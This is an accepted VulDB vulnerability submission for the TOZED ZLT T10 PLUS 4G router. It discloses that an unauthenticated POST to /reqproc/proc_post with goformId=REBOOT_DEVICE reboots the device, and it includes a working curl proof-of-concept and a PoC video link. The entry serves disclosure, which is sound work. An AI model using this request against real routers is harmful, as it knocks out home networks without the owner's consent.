| Title | TOZED ZLT T10 PLUS (ZLT family 4G CPE) T10PLUS_3.04.15 Denial of Service |
|---|
| Description | The router’s web interface accepts an unauthenticated POST request to `/reqproc/proc_post` with `goformId=REBOOT_DEVICE` and reboots the device without requiring an active authenticated session. This allows an attacker with network access to the router (LAN or guest network depending on configuration) to remotely reboot the device, causing a denial-of-service to the home network.
Proof-of-Concept (POC) HTTP request (tested on device):
curl -v -X POST "http://192.168.8.1/reqproc/proc_post" \
-H "Content-Type: application/x-www-form-urlencoded;charset=utf-8" \
--data "isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE"
PoC video: https://youtu.be/3Me3wlH5cfU |
|---|
| Source | ⚠️ http://192.168.8.1/reqproc/proc_post?isTest=false&uniquelogincredentials=&goformId=REBOOT_DEVICE |
|---|
| User | Anonymous User |
|---|
| Submission | 10/21/2025 22:37 (9 months ago) |
|---|
| Moderation | 11/08/2025 17:44 (18 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 331635 [TOZED ZLT T10 T10PLUS_3.04.15 Reboot /reqproc/proc_post denial of service] |
|---|
| Points | 20 |
|---|